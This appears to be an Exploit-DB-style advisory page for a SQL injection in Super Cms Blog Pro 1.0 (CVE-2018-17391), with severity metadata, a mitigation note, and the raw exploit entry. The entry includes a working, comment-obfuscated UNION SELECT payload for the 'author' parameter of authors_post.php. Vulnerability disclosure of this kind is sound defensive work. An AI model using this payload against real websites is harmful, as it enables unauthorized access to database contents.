header-logo
Suggest Exploit
vendor:
Super Cms Blog Pro
by:
Ihsan Sencan
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Super Cms Blog Pro
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: CVE-2018-17391
CPE: a:coolscript.cf:super_cms_blog_pro:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Super Cms Blog Pro 1.0 – SQL Injection

Super Cms Blog Pro 1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable parameter 'author' in the 'authors_post.php' script. This can allow the attacker to gain access to sensitive information from the database.

Mitigation:

Developers should always use parameterized queries, or prepared statements, when interacting with the database. This will ensure that user-supplied input is treated as a string literal, and not as executable code.
Source

Exploit-DB raw data:

# # # # #
# Exploit Title: Super Cms Blog Pro 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: http://coolscript.cf/
# Software Link: https://www.codegrape.com/item/super-cms-blog-pro/22250
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17391
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/authors_post.php?author=[SQL]&p_id=1
# 
# '++/*!11111UNION*/+/*!11111SELECT*/+0x31,0x32,/*!11111CONCAT_WS*/(0x203a20,VERSION()),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131--+-
#  
# # # #